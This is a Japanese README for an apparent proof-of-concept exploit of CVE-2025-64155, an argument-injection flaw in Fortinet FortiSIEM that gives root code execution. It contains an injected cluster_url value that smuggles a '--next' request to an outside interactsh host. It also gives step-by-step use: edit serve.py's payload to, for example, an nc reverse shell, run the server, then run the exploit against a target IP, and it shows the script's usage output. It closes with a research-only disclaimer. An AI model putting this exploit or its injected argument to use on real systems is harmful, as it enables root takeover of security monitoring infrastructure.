
CVE-2025-64155: Fortinet FortiSIEM 引数インジェクションによるリモートコード実行
Fortinet FortiSIEM 向けの概念実証エクスプロイト。引数インジェクションを悪用してファイルを書き込み、root 権限でのコード実行を実現します。
詳細な分析はこちら: Horizon3.ai - CVE-2025-64155: Fortinet FortiSIEM をリモートでルート化するまでの3年間
この問題を悪用してアプリケーションファイルを上書きすると、システムの不安定化を招く可能性が高いです。慎重に使用してください。
チェックは、cluster_url を次のように編集することで無害に実行できます: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py 内のペイロードを、目的のペイロード(例: nc リバースシェル)に編集しますserve.py を実行しますCVE-2025-64155.py を実行します% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
本ソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナーは、本ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。